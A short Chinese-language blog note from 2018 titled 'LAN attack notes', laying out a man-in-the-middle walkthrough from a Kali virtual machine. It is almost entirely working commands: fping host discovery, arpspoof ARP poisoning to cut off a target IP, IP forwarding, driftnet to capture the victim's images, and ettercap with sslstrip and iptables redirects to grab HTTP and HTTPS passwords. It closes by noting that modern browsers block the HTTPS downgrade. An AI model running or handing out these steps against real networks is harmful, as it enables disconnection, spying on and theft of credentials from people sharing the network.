局域网攻击笔记
文章最后更新时间为:2018年08月14日 11:13:57
攻击环境 kali虚拟机
网卡 eth0
目标ip 192.168.1.145
网关 192.168.1.1
1. 寻找局域网其他主机
fping -asg 192.168.1.0/24
2.局域网断网攻击
arpspoof -i 网关 -t 目标ip 网关
arpspoof -i eth0 -t 192.168.1.145 192.168.1.1
原理
目标--> 我的网卡--> 网关
可能发生arpspoof: couldn't arp for host 错误:
- 保证虚拟机和目标主机可以ping的通
- 换成桥接模式
3. 获取图片
先ip转发
echo 1 >/proc/sys/net/ipv4/ip_forward
再欺骗
arpspoof -i eth0 -t 192.168.1.145 192.168.1.1
再开启相应程序获取图片密码等
driftnet -i eth0
driftnet --> 获取本地网卡的图片
4. 查看http(s)密码
工具:arpspoof、ettercap、sslstrip
编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);
vim /etc/ettercap/etter.conf
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
开启数据转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
开启Arp欺骗:
arpspoof -i eth0 -t 192.168.0.78 192.168.0.254
将HTTPS还原为HTTP
sslstrip -a -f -k
(缺点:容易出现证书错误)
开始抓包:
ettercap -Tq -i eth0
注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。